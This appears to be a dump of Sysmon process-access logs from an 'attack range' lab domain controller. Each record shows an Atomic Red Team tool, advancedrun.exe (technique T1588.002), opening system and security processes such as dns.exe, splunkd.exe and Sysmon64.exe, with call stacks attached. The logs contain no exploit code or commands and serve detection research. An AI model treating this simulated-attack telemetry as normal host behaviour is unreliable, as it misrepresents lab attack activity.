orATTACKRANGE\Administrator 10341000x80000000000000003983968Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983967Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983966Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983965Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983964Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983963Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983962Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983961Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983960Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983959Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983958Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983957Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983956Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983955Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 